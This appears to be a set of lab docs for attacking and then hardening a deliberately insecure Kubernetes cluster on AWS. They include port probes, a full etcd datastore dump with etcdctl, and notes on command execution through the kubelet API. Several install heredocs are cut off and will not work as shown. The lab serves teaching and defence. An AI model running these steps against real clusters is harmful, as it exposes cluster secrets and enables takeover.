pod/container. 368 | - `/runningpods/` - Lists all running pods in short JSON form 369 | - `/debug/pprof/` - Various go debugging performance endpoints 370 | 371 | Directly leveraging the unprotected `kubelet` API to: 372 | - [List running Pods](kubelet-list-pods.md) 373 | - [View Pod Logs](kubelet-pod-logs.md) 374 | - [Execute commands](kubelet-exploit.md) inside the containers 375 | 376 | As you can see, the `kubelet` is essentially a remote API running as `root` on your system that /always/ needs additional hardening to prevent seriously useful avenues for escalation. 377 | 378 | ### Probe the `Kubernetes Scheduler HTTP` service: 379 | 380 | Verify the port is responding: 381 | ``` 382 | $ nc -vz $CONTROLLERIP 10251 383 | Connection to 54.89.108.72 port 10251 [tcp/*] succeeded! 384 | ``` 385 | Hit `tcp/10251` via curl: 386 | ``` 387 | $ curl $CONTROLLERIP:10251 388 | 404 page not found 389 | $ curl $CONTROLLERIP:10251/healthz 390 | ok 391 | ``` 392 | 393 | ### Probe the `Kubernetes Controller Manager` service: 394 | 395 | Verify the port is responding: 396 | ``` 397 | $ nc -vz $CONTROLLERIP 10252 398 | Connection to 54.89.108.72 port 10252 [tcp/apollo-relay] succeeded! 399 | ``` 400 | Hit `tcp/10252` via curl: 401 | ``` 402 | $ curl $CONTROLLERIP:10252 403 | 404 page not found 404 | $ curl $CONTROLLERIP:10252/healthz 405 | ok 406 | ``` 407 | 408 | ### Probe the `Kubelet Read-Only` service: 409 | 410 | Verify the port is responding: 411 | ``` 412 | $ nc -vz $CONTROLLERIP 10255 413 | Connection to 54.89.108.72 port 10255 [tcp/*] succeeded! 414 | ``` 415 | According to the source code, the following endpoints are available on the Kubelet "read-only" API: 416 | 417 | - `/metrics` 418 | - `/metrics/cadvisor` 419 | - `/spec/` 420 | - `/stats/` 421 | 422 | Hit `tcp/10255` via curl: 423 | 424 | ``` 425 | $ curl $CONTROLLERIP:10255 426 | 404 page not found 427 | ``` 428 | The `/healthz` endpoint reports the health of the Kubelet. 429 | ``` 430 | $ curl $CONTROLLERIP:10255/healthz 431 | ok 432 | ``` 433 | The `/metrics` from the Kubelet indicate how busy the node is in terms of the `docker` runtime and how many containers "churn" on this node. 434 | 435 | [```$ curl $CONTROLLERIP:10255/metrics ```](cmd/kubelet-metrics.md) 436 | 437 | The `/metrics/cadvisor` endpoint passes through the metrics from the cAdvisor port. 438 | 439 | [```$ curl $CONTROLLERIP:10255/metrics/cadvisor```](cmd/kubelet-metrics-cadvisor.md) 440 | 441 | The `/spec/` endpoint writes the cAdvisor `MachineInfo()` output, and this gives a couple hints that it runs on AWS, the instance type, and the instance ID: 442 | 443 | [```$ curl $CONTROLLERIP:10255/spec/ ```](cmd/kubelet-spec.md) 444 | 445 | The `/pods` endpoint provides the near-equivalent of `kubectl get pods -o json` for the pods running on this node: 446 | 447 | [`$ curl -s $CONTROLLERIP:10255/pods`](cmd/kubelet-pods.md) 448 | 449 | ### Probe the `Kube-Proxy Healthcheck` service: 450 | 451 | Verify the port is responding: 452 | ``` 453 | $ nc -vz $CONTROLLERIP 10256 454 | Connection to 54.89.108.72 port 10256 [tcp/*] succeeded! 455 | ``` 456 | Hit `tcp/10256` via curl: 457 | ``` 458 | $ curl $CONTROLLERIP:10256 459 | 404 page not found 460 | $ curl $CONTROLLERIP:10256/healthz 461 | {"lastUpdated": "2018-03-27 21:17:09.14039841 +0000 UTC m=+888081.767665429","currentTime": "2018-03-27 21:17:36.679120214 +0000 UTC m=+888109.306387163"} 462 | ``` 463 | 464 | Access to the Kubernetes API or the Kubelet read/write API from anywhere is almost a guaranteed full compromise of the cluster including all of its data, secrets, and source code. 465 | 466 | [Back](/README.md#level-0-attacks) | [Next](direct-worker.md) 467 | -------------------------------------------------------------------------------- /docs/direct-etcd.md: -------------------------------------------------------------------------------- 1 | # Access the Etcd Services Directly 2 | 3 | ## Services Available 4 | 5 | - `22/tcp` - [SSH](https://openssh.org) 6 | - `2379/tcp` - [Etcd server service](https://github.com/coreos/etcd#etcd-tcp-ports) 7 | - `2380/tcp` - [Etcd peer discovery service](https://github.com/coreos/etcd#etcd-tcp-ports) 8 | 9 | This initial `etcd` configuration is unlikely to be found in the wild, but it's important to understand the mechanics and the risks of letting the data in `etcd` fall into the hands of a malicious entity. 10 | 11 | Set the `etcd` IP to a variable: 12 | ``` 13 | $ export ETCDIP=$(aws ec2 describe-instances \ 14 | --region ${AWS_DEFAULT_REGION} \ 15 | --filter 'Name=tag:Name,Values=etcd' \ 16 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 17 | --output text) 18 | ``` 19 | 20 | ### Probe the `ssh` port: 21 | 22 | Verify the port is responding: 23 | ``` 24 | $ nc -v $ETCDIP 22 25 | Connection to 18.233.67.127 port 22 [tcp/ssh] succeeded! 26 | SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 27 | ``` 28 | While not completely insecure with decent `sshd` configuration, exposure of SSH credentials/keys from other systems that are shared with this system means an attacker can attempt to use them directly. Also, SSH bots are hyper-focused on the known cloud-provider IP ranges, so it's not a place to be complacent. 29 | 30 | ### Probe the `etcd` server port: 31 | 32 | Verify the port is responding: 33 | ``` 34 | $ nc -z $ETCDIP 2379 35 | Connection to 18.233.67.127 port 2379 [tcp/*] succeeded! 36 | ``` 37 | From this, we know that an external IP can access the `etcd` server directly. This shouldn't ever be the case! 38 | 39 | Verify that the port is a web port: 40 | ``` 41 | $ curl $ETCDIP:2379 42 | 404 page not found 43 | ``` 44 | This tells us that `etcd` is not listening with TLS and it's reachable. This is catastrophically bad for the integrity of this cluster. The next steps are to validate the version and get all the data. 45 | 46 | Obtain the `etcd` version: 47 | ``` 48 | $ curl $ETCDIP:2379/version 49 | {"etcdserver":"3.2.11","etcdcluster":"3.2.0"} 50 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" version 51 | etcdctl version: 3.3.2 52 | API version: 3.3 53 | ``` 54 | 55 | Use `etcdctl` to get the `etcd` cluster health: 56 | ``` 57 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" endpoint health 58 | http://18.233.67.127:2379 is healthy: successfully committed proposal: took = 6.903553ms 59 | ``` 60 | 61 | Get the `etcd` cluster members: 62 | ``` 63 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" member list 64 | e0187950b759a617, started, ip-10-1-0-5, http://10.1.0.5:2380, http://10.1.0.5:2379 65 | ``` 66 | 67 | Because the `etcdctl` commands were successful, it means we most likely have full access to the data in this `etcd` cluster. It's a very similar parallel to having direct `root` access to a database that backends a webserver. 68 | 69 | Dump the entire contents of `etcd`'s datastore: 70 | ``` 71 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" get "" --from-key > etcd.raw 72 | or 73 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" snapshot save etcd.dump 74 | Snapshot saved at etcd.dump 75 | ``` 76 | 77 | Dig into the `etcd.dump` using `vi` or [boltbrowser](https://github.com/br0xen/boltbrowser): 78 | ``` 79 | $ vi etcd.raw 80 | or 81 | $ vi etcd.dump 82 | or 83 | $ ./boltbrowser etcd.dump 84 | ``` 85 | We now have a complete, bit-for-bit copy of the entire state of the cluster. This includes pods, configmaps, secrets, and more. In essence, this cluster is completely "pwned". 86 | 87 | ### Probe the `etcd` peer discovery port: 88 | 89 | Verify the port is responding: 90 | ``` 91 | $ nc -z $ETCDIP 2380 92 | Connection to 18.233.67.127 port 2380 [tcp/*] succeeded! 93 | ``` 94 | 95 | Verify that the port is a web port: 96 | ``` 97 | $ curl $ETCDIP:2380 98 | 404 page not found 99 | ``` 100 | 101 | Obtain the `etcd` version: 102 | ``` 103 | $ curl $ETCDIP:2380/version 104 | {"etcdserver":"3.2.11","etcdcluster":"3.2.0"} 105 | $ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" version 106 | etcdctl version: 3.3.2 107 | API version: 3.3 108 | ``` 109 | The `etcd` discovery service should not be exposed to any systems but the `etcd` servers. Because we have direct access to `tcp/2379` and `tcp/2380`, it's likely that a "rogue" etcd attack could be carried out. 110 | 111 | [Back](/README.md#level-0-attacks) | [Next](direct-controller.md) 112 | -------------------------------------------------------------------------------- /docs/direct-worker.md: -------------------------------------------------------------------------------- 1 | # Access the Kubernetes Worker 2 | 3 | ## Services Available 4 | 5 | - `22/tcp` - [SSH](https://openssh.org) 6 | - `4194/tcp` - [Kubelet cAdvisor endpoint](https://github.com/google/cadvisor) 7 | - `10248/tcp` - [Kubelet Healthz Endpoint](https://kubernetes.io/docs/reference/generated/kubelet/) 8 | - `10249/tcp` - [Kube-Proxy Metrics](https://kubernetes.io/docs/reference/generated/kube-proxy/) 9 | - `10250/tcp` - [Kubelet Read/Write API](https://kubernetes.io/docs/reference/generated/kubelet) 10 | - `10255/tcp` - [Kubelet Read-only API](https://kubernetes.io/docs/reference/generated/kubelet) 11 | - `10256/tcp` - [Kube-Proxy health check server](https://kubernetes.io/docs/reference/generated/kube-proxy/) 12 | 13 | Unlike the `etcd` and `controller` configuration, this configuration of the `kubelet` isn't that far off most recent configurations. Many self-made clusters do a decent job protecting `etcd` and the API server, but not all of them ensure the `kubelet` performs authn/authz to protect its API. 14 | 15 | For more information on the real risks of this attack vector, here is a recent writeup of an actual attack: 16 | - [https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c](https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c) 17 | 18 | Set the SSH Key, Region, and `worker-1` IP to variables: 19 | 20 | ``` 21 | $ export KEY_NAME="hkfs" 22 | $ export AWS_DEFAULT_REGION="us-east-1" 23 | $ export WORKER1IP=$(aws ec2 describe-instances \ 24 | --region ${AWS_DEFAULT_REGION} \ 25 | --filter 'Name=tag:Name,Values=worker-1' \ 26 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 27 | --output text) 28 | ``` 29 | 30 | ### Probe the `ssh` port: 31 | 32 | Verify the port is responding: 33 | ``` 34 | $ nc -v $WORKER1IP 22 35 | Connection to 54.234.61.224 port 22 [tcp/ssh] succeeded! 36 | SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 37 | ``` 38 | 39 | ### Probe the `cAdvisor` service: 40 | 41 | Verify the port is responding: 42 | ``` 43 | $ $ nc -vz $WORKER1IP 4194 44 | Connection to 54.234.61.224 port 4194 [tcp/*] succeeded! 45 | ``` 46 | Hit `tcp/4194` via curl: 47 | ``` 48 | $ curl $WORKER1IP:4194 49 | Temporary Redirect. 50 | ``` 51 | 52 | Just like the [controller](direct-controller.md), the `worker` provides similar metrics from `cAdvisor` for this host. 53 | 54 | ### Probe the `Kubelet Healthz` service: 55 | 56 | Verify the port is responding: 57 | ``` 58 | $ nc -vz $WORKER1IP 10248 59 | nc: connect to 54.234.61.224 port 10248 (tcp) failed: Connection refused 60 | ``` 61 | 62 | It's only running on the `localhost` address: 63 | ``` 64 | $ ssh -i ${KEY_NAME}.pem ubuntu@$WORKER1IP 65 | ubuntu@ip-10-1-0-11:~$ curl localhost:10248/ 66 | 404 page not found 67 | ubuntu@ip-10-1-0-11:~$ curl localhost:10248/healthz 68 | ok 69 | ``` 70 | 71 | ### Probe the `Kube-Proxy Metrics` service: 72 | 73 | Verify the port is responding: 74 | ``` 75 | $ nc -vz $WORKER1IP 10249 76 | nc: connect to 54.234.61.224 port 10249 (tcp) failed: Connection refused 77 | ``` 78 | 79 | It's only running on the `localhost` address: 80 | ``` 81 | $ ssh -i ${KEY_NAME}.pem ubuntu@$WORKER1IP 82 | ubuntu@ip-10-1-0-11:~$ curl localhost:10249/healthz 83 | ok 84 | ubuntu@ip-10-1-0-11:~$ curl localhost:10249/metrics 85 | ``` 86 | 87 | Similar to the [controller](direct-controller.md), metrics on this host's `kube-proxy` are available at this endpoint. 88 | 89 | ### Probe the `Kubelet Read/Write` service: 90 | 91 | Verify the port is responding: 92 | ``` 93 | $ nc -vz $WORKER1IP 10250 94 | Connection to 54.234.61.224 port 10250 [tcp/*] succeeded! 95 | ``` 96 | 97 | Hit `tcp/10250` via curl: 98 | 99 | ``` 100 | $ curl -sk https://$WORKER1IP:10250/ 101 | ``` 102 | 103 | So, the Kubelet is always listening on a TLS port, but by default, it's not authenticating or authorizing access to it. The `-s` is to be "silent" and the `-k` tells curl to allow connections without certificates. 104 | 105 | According to the source code, the following endpoints are available on both the Kubelet "read-only" API and "read/write" API: 106 | 107 | - `/metrics` 108 | - `/metrics/cadvisor` 109 | - `/spec/` 110 | - `/stats/` 111 | 112 | The following endpoints are only available on the Kubelet's "read/write" API: 113 | - `/logs/` - Get logs from a pod/container. 114 | - `/run/` - Alias for `/exec/` 115 | - `/exec/` - Exec a command in a running container 116 | - `/attach/` - Attach to the `stdout` of a running container 117 | - `/portForward/` - Forward a port directly to a container 118 | - `/containerLogs/` - Get logs from a pod/container. 119 | - `/runningpods/` - Lists all running pods in short JSON form 120 | - `/debug/pprof/` - Various go debugging performance endpoints 121 | 122 | Refer to the [controller](direct-controller.md#probe-the-kubelet-readwrite-service) services details for example outputs as these provide similar output for that given node running the `kubelet`. 123 | 124 | ### Probe the `Kubelet Read-Only` service: 125 | 126 | Verify the port is responding: 127 | ``` 128 | $ nc -vz $WORKER1IP 10255 129 | Connection to 54.234.61.224 port 10255 [tcp/*] succeeded! 130 | ``` 131 | According to the source code, the following endpoints are available on the Kubelet "read-only" API: 132 | 133 | - `/metrics` 134 | - `/metrics/cadvisor` 135 | - `/spec/` 136 | - `/stats/` 137 | 138 | Refer to the [controller](direct-controller.md) services details for example outputs as these provide similar output for that given node running the `kubelet`. 139 | 140 | ### Probe the `Kube-Proxy Healthcheck` service: 141 | 142 | Verify the port is responding: 143 | ``` 144 | $ nc -vz $WORKER1IP 10256 145 | Connection to 54.234.61.224 port 10256 [tcp/*] succeeded! 146 | ``` 147 | Hit `tcp/10256` via curl: 148 | ``` 149 | $ curl $WORKER1IP:10256 150 | 404 page not found 151 | $ curl $WORKER1IP:10256/healthz 152 | {"lastUpdated": "2018-03-27 21:17:09.14039841 +0000 UTC m=+888081.767665429","currentTime": "2018-03-27 21:17:36.679120214 +0000 UTC m=+888109.306387163"} 153 | ``` 154 | 155 | [Back](/README.md#level-0-attacks) | [Next](l1-security-groups.md) 156 | -------------------------------------------------------------------------------- /docs/enumerate-ports.md: -------------------------------------------------------------------------------- 1 | # Enumerate Exposed Ports and Services 2 | 3 | ## Etcd 4 | 5 | SSH into the `etcd` instance 6 | ``` 7 | $ export KEY_NAME="hkfs" 8 | $ export AWS_DEFAULT_REGION="us-east-1" 9 | $ ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances \ 10 | --region ${AWS_DEFAULT_REGION} \ 11 | --filter 'Name=tag:Name,Values=etcd' \ 12 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 13 | --output text) 14 | ``` 15 | On the `etcd` system, list the services and processes running: 16 | ``` 17 | $ sudo lsof -i | grep LIST 18 | etcd 1112 root 5u IPv4 15682 0t0 TCP ip-10-1-0-5.ec2.internal:2380 (LISTEN) 19 | etcd 1112 root 6u IPv4 15683 0t0 TCP ip-10-1-0-5.ec2.internal:2379 (LISTEN) 20 | etcd 1112 root 7u IPv4 15684 0t0 TCP localhost:2379 (LISTEN) 21 | sshd 1137 root 3u IPv4 15652 0t0 TCP *:ssh (LISTEN) 22 | sshd 1137 root 4u IPv6 15660 0t0 TCP *:ssh (LISTEN) 23 | ``` 24 | #### Services 25 | - `22/tcp` - [SSH](https://openssh.org) 26 | - `2379/tcp` - [Etcd server service](https://github.com/coreos/etcd#etcd-tcp-ports) 27 | - `2380/tcp` - [Etcd peer discovery service](https://github.com/coreos/etcd#etcd-tcp-ports) 28 | 29 | ## Controller 30 | 31 | SSH into the `controller` instance 32 | ``` 33 | $ ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances \ 34 | --region ${AWS_DEFAULT_REGION} \ 35 | --filter 'Name=tag:Name,Values=controller' \ 36 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 37 | --output text) 38 | ``` 39 | 40 | On the `controller` system, list the services and processes running: 41 | ``` 42 | $ sudo lsof -i -nP | grep LIST 43 | kube-prox 1237 root 6u IPv6 16597 0t0 TCP *:10256 (LISTEN) 44 | kube-prox 1237 root 8u IPv4 16599 0t0 TCP 127.0.0.1:10249 (LISTEN) 45 | kubelet 1257 root 6u IPv6 17074 0t0 TCP *:4194 (LISTEN) 46 | kubelet 1257 root 18u IPv4 17213 0t0 TCP 127.0.0.1:10248 (LISTEN) 47 | kubelet 1257 root 20u IPv6 17216 0t0 TCP *:10250 (LISTEN) 48 | kubelet 1257 root 21u IPv6 17218 0t0 TCP *:10255 (LISTEN) 49 | sshd 1268 root 3u IPv4 15100 0t0 TCP *:22 (LISTEN) 50 | sshd 1268 root 4u IPv6 15102 0t0 TCP *:22 (LISTEN) 51 | kube-cont 1275 root 5u IPv6 16701 0t0 TCP *:10252 (LISTEN) 52 | kube-apis 1297 root 67u IPv6 19320 0t0 TCP *:8080 (LISTEN) 53 | kube-sche 1303 root 3u IPv6 16637 0t0 TCP *:10251 (LISTEN) 54 | ``` 55 | 56 | #### Services 57 | - `22/tcp` - [SSH](https://openssh.org) 58 | - `4194/tcp` - [Kubelet cAdvisor endpoint](https://github.com/google/cadvisor) 59 | - `8080/tcp` - [Kubernetes API Server "Insecure" Port](https://kubernetes.io/docs/reference/generated/kube-apiserver/) 60 | - `10248/tcp` - [Kubelet Healthz Endpoint](https://kubernetes.io/docs/reference/generated/kubelet/) 61 | - `10249/tcp` - [Kube-Proxy Metrics](https://kubernetes.io/docs/reference/generated/kube-proxy/) 62 | - `10250/tcp` - [Kubelet Read/Write API](https://kubernetes.io/docs/reference/generated/kubelet) 63 | - `10251/tcp` - [Kubernetes Scheduler HTTP Service](https://kubernetes.io/docs/reference/generated/kube-scheduler/) 64 | - `10252/tcp` - [Kubernetes Controller Manager HTTP Service](https://kubernetes.io/docs/reference/generated/kube-controller-manager/) 65 | - `10255/tcp` - [Kubelet Read-only API](https://kubernetes.io/docs/reference/generated/kubelet) 66 | - `10256/tcp` - [Kube-Proxy health check server](https://kubernetes.io/docs/reference/generated/kube-proxy/) 67 | 68 | ## Worker 69 | 70 | SSH into the `worker-1` instance 71 | ``` 72 | $ ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances \ 73 | --region ${AWS_DEFAULT_REGION} \ 74 | --filter 'Name=tag:Name,Values=worker-1' \ 75 | --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \ 76 | --output text) 77 | ``` 78 | 79 | On the `worker-1` system, list the services and processes running: 80 | ``` 81 | $ sudo lsof -i -nP | grep LIST 82 | kube-prox 1240 root 10u IPv4 16479 0t0 TCP 127.0.0.1:10249 (LISTEN) 83 | kube-prox 1240 root 11u IPv6 16484 0t0 TCP *:10256 (LISTEN) 84 | kubelet 1251 root 6u IPv6 16841 0t0 TCP *:4194 (LISTEN) 85 | kubelet 1251 root 18u IPv4 16945 0t0 TCP 127.0.0.1:10248 (LISTEN) 86 | kubelet 1251 root 21u IPv6 16950 0t0 TCP *:10250 (LISTEN) 87 | kubelet 1251 root 22u IPv6 16952 0t0 TCP *:10255 (LISTEN) 88 | sshd 1299 root 3u IPv4 15256 0t0 TCP *:22 (LISTEN) 89 | sshd 1299 root 4u IPv6 15258 0t0 TCP *:22 (LISTEN) 90 | ``` 91 | 92 | #### Services 93 | - `22/tcp` - [SSH](https://openssh.org) 94 | - `4194/tcp` - [Kubelet cAdvisor endpoint](https://github.com/google/cadvisor) 95 | - `10248/tcp` - [Kubelet Healthz Endpoint](https://kubernetes.io/docs/reference/generated/kubelet/) 96 | - `10249/tcp` - [Kube-Proxy Metrics](https://kubernetes.io/docs/reference/generated/kube-proxy/) 97 | - `10250/tcp` - [Kubelet Read/Write API](https://kubernetes.io/docs/reference/generated/kubelet) 98 | - `10255/tcp` - [Kubelet Read-only API](https://kubernetes.io/docs/reference/generated/kubelet) 99 | - `10256/tcp` - [Kube-Proxy health check server](https://kubernetes.io/docs/reference/generated/kube-proxy/) 100 | 101 | [Back](/README.md#level-0-attacks) | [Next](direct-etcd.md) 102 | -------------------------------------------------------------------------------- /docs/full-original.md: -------------------------------------------------------------------------------- 1 | # Installation 2 | ## Create the VPC 3 | 4 | ### Cloudformation 5 | 6 | #### Deploy the Cloudformation Template 7 | 8 | ``` 9 | export STACK_NAME="hkfs" 10 | export AWS_DEFAULT_REGION="us-east-1" 11 | export KEY_NAME="hkfs" 12 | export IMAGE_ID="ami-66506c1c" 13 | 14 | aws cloudformation create-stack --region ${AWS_DEFAULT_REGION} --stack-name ${STACK_NAME} --template-body file://templates/${STACK_NAME}.json --output text 15 | 16 | ``` 17 | 18 | #### Obtain the Necessary Variables 19 | 20 | ``` 21 | VPC_ID="$(aws cloudformation describe-stacks --region ${AWS_DEFAULT_REGION} --query 'Stacks[*].Outputs[?OutputKey==`VPCId`].OutputValue[]' --stack-name ${STACK_NAME} --output text)" 22 | echo "${VPC_ID}" 23 | SG_ID="$(aws ec2 describe-security-groups --query 'SecurityGroups[*].GroupId' --region ${AWS_DEFAULT_REGION} --filter "Name=vpc-id,Values=${VPC_ID}" --output text)" 24 | echo "${SG_ID}" 25 | SUBNET_ID="$(aws ec2 describe-subnets --region ${AWS_DEFAULT_REGION} --filter "Name=tag:Name,Values=${STACK_NAME}-subnet" --query 'Subnets[*].SubnetId' --output text)" 26 | echo "${SUBNET_ID}" 27 | ``` 28 | 29 | #### Allow Just our IPs to Reach these Instances on all Ports 30 | 31 | ``` 32 | aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} --group-id ${SG_ID} --protocol all --port 0 --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 33 | ``` 34 | 35 | ## Instance Creation 36 | 37 | ### Prepare a Keypair 38 | 39 | #### Create an SSH Keypair 40 | 41 | ``` 42 | aws ec2 create-key-pair --region ${AWS_DEFAULT_REGION} --key-name ${KEY_NAME} --query 'KeyMaterial' --output text > ${KEY_NAME}.pem 43 | chmod 600 ${KEY_NAME}.pem 44 | ``` 45 | 46 | ### Create Systems 47 | 48 | #### Etcd 49 | 50 | ``` 51 | aws ec2 run-instances --region ${AWS_DEFAULT_REGION} --image-id ${IMAGE_ID} --count 1 --instance-type t2.micro --key-name ${KEY_NAME} --subnet-id ${SUBNET_ID} --associate-public-ip-address --query 'Instances[0].InstanceId' --output text --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=etcd}]' --private-ip-address 10.1.0.5 --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' 52 | ``` 53 | 54 | #### Master 55 | 56 | ``` 57 | aws ec2 run-instances --region ${AWS_DEFAULT_REGION} --image-id ${IMAGE_ID} --count 1 --instance-type t2.small --key-name ${KEY_NAME} --subnet-id ${SUBNET_ID} --associate-public-ip-address --query 'Instances[0].InstanceId' --output text --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=controller}]' --private-ip-address 10.1.0.10 --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' 58 | ``` 59 | 60 | #### Worker-1 and Worker-2 61 | 62 | ``` 63 | aws ec2 run-instances --region ${AWS_DEFAULT_REGION} --image-id ${IMAGE_ID} --count 1 --instance-type t2.small --key-name ${KEY_NAME} --subnet-id ${SUBNET_ID} --associate-public-ip-address --query 'Instances[0].InstanceId' --output text --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=worker-1}]' --private-ip-address 10.1.0.11 --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' 64 | 65 | aws ec2 run-instances --region ${AWS_DEFAULT_REGION} --image-id ${IMAGE_ID} --count 1 --instance-type t2.small --key-name ${KEY_NAME} --subnet-id ${SUBNET_ID} --associate-public-ip-address --query 'Instances[0].InstanceId' --output text --tag-specifications 'ResourceType=instance,Tags=[{Key=Name,Value=worker-2}]' --private-ip-address 10.1.0.12 --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=32}' 66 | ``` 67 | 68 | ## VPC Routing 69 | 70 | ### Per-Node Pod CIDR Routes 71 | 72 | #### Obtain the Route Table ID 73 | 74 | ``` 75 | ROUTETABLE_ID=$(aws ec2 describe-route-tables --region ${AWS_DEFAULT_REGION} --filter "Name=tag:Name,Values=${STACK_NAME}-rt" --query 'RouteTables[*].RouteTableId' --output text) 76 | ``` 77 | 78 | #### Obtain the ```controller``` ENI ID 79 | 80 | ``` 81 | CONTROLLERENI_ID=$(aws ec2 describe-instances --region ${AWS_DEFAULT_REGION} --filter 'Name=tag:Name,Values=controller' --query 'Reservations[].Instances[].NetworkInterfaces[0].NetworkInterfaceId' --output text) 82 | ``` 83 | 84 | #### Add the ```controller``` Pod CIDR Route to the Route Table 85 | 86 | ``` 87 | aws ec2 create-route --region ${AWS_DEFAULT_REGION} --route-table-id ${ROUTETABLE_ID} --network-interface-id ${CONTROLLERENI_ID} --destination-cidr-block '10.2.0.0/24' --output text 88 | ``` 89 | 90 | #### Obtain the ```worker-1``` ENI ID 91 | 92 | ``` 93 | WORKER1ENI_ID=$(aws ec2 describe-instances --region ${AWS_DEFAULT_REGION} --filter 'Name=tag:Name,Values=worker-1' --query 'Reservations[].Instances[].NetworkInterfaces[0].NetworkInterfaceId' --output text) 94 | ``` 95 | 96 | #### Add the ```worker-1``` Pod CIDR Route to the Route Table 97 | 98 | ``` 99 | aws ec2 create-route --region ${AWS_DEFAULT_REGION} --route-table-id ${ROUTETABLE_ID} --network-interface-id ${WORKER1ENI_ID} --destination-cidr-block '10.2.1.0/24' --output text 100 | ``` 101 | 102 | #### Obtain the ```worker-2``` ENI ID 103 | 104 | ``` 105 | WORKER2ENI_ID=$(aws ec2 describe-instances --region ${AWS_DEFAULT_REGION} --filter 'Name=tag:Name,Values=worker-2' --query 'Reservations[].Instances[].NetworkInterfaces[0].NetworkInterfaceId' --output text) 106 | ``` 107 | 108 | #### Add the ```worker-2``` Pod CIDR Route to the Route Table 109 | 110 | ``` 111 | aws ec2 create-route --region ${AWS_DEFAULT_REGION} --route-table-id ${ROUTETABLE_ID} --network-interface-id ${WORKER2ENI_ID} --destination-cidr-block '10.2.2.0/24' --output text 112 | ``` 113 | 114 | ## Instance Configuration 115 | 116 | ### Configure the Etcd Instance 117 | 118 | #### SSH Into the Etcd Instance 119 | ``` 120 | ssh -i ${KEY_NAME}.pem ubuntu@$(aws ec2 describe-instances --region ${AWS_DEFAULT_REGION} --filter 'Name=tag:Name,Values=etcd' --query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' --output text) 121 | ``` 122 | 123 | #### Download the Etcd Binary 124 | ``` 125 | wget -q --show-progress --https-only --timestamping \ 126 | "https://github.com/coreos/etcd/releases/download/v3.2.11/etcd-v3.2.11-linux-amd64.tar.gz" 127 | ``` 128 | 129 | #### Extract the Etcd Binary and Create Needed Folders 130 | ``` 131 | tar -xvf etcd-v3.2.11-linux-amd64.tar.gz 132 | sudo mv etcd-v3.2.11-linux-amd64/etcd* /usr/local/bin/ 133 | sudo mkdir -p /etc/etcd /var/lib/etcd 134 | ``` 135 | 136 | #### Create the ```etcd.service``` Systemd Unit 137 | ``` 138 | cat > etcd.service < kube-apiserver.service < kube-controller-manager.service < kube-scheduler.service < kubelet.service < kubeconfig < kube-proxy.service < kubelet.service < kubeconfig < kube-proxy.service < kubelet.service < kubeconfig < kube-proxy.service < 4m v1.9.2 706 | ip-10-1-0-11 Ready 2m v1.9.2 707 | ip-10-1-0-12 Ready 46s v1.9.2 708 | ``` 709 | 710 | #### Install ```kube-dns``` 711 | 712 | ##### Create the ```kube-dns.yml``` Definition 713 | 714 | ``` 715 | cat > kube-dns.yml < kubeconfig < ca-config.json < ca-csr.json < admin-csr.json < kubernetes-csr.json < kube-apiserver.service < 16d v1.9.2 272 | ip-10-1-0-11 Ready 16d v1.9.2 273 | ip-10-1-0-12 Ready 16d v1.9.2 274 | ``` 275 | 276 | Fantastic! From outside the cluster, we only allow SSH (`tcp/22`) and client-certificates are now need to access the Kubernetes API Server over TLS (`tcp/6443`). All sorts of attacks are now thwarted—and we're done, right? Well, depending on the workload and the access to the cluster, it *may* be sufficient, but we'll test those assumptions. 277 | 278 | [Back](/README.md#level-1-hardening) | [Next](deploy-vulnapp.md) 279 | -------------------------------------------------------------------------------- /docs/l1-security-groups.md: -------------------------------------------------------------------------------- 1 | # Level 1 Hardening - Security Groups 2 | 3 | ## Limit the services available externally 4 | 5 | In the [creation of the VPC](create-vpc.md) instructions, the security group protecting the EC2 instances had this rule applied to simulate leaving everything "wide open" to the Internet: 6 | 7 | ``` 8 | $ aws ec2 authorize-security-group-ingress --region ${AWS_DEFAULT_REGION} \ 9 | --group-id ${SG_ID} --protocol all --port 0 \ 10 | --cidr $(dig +short myip.opendns.com @resolver1.opendns.com)/32 11 | ``` 12 | 13 | If we had used `0.0.0.0/0` , that would be true. Instead we used our source IP in its place to not be completely irresponsible. 14 | 15 | Given that direct access to the services running on the cluster in their current configuration is a `root`-privileged remote command execution vulnerability, it's time to change that. 16 | 17 | So, let's do the least amount of work possible to remedy this. 18 | 19 | Export the necessary variables: 20 | ``` 21 | $ export STACK_NAME="hkfs" 22 | $ export AWS_DEFAULT_REGION="us-east-1" 23 | $ export KEY_NAME="hkfs" 24 | ``` 25 | Obtain the Security Group ID: 26 | ``` 27 | $ VPC_ID="$(aws cloudformation describe-stacks --region ${AWS_DEFAULT_REGION} \ 28 | --query 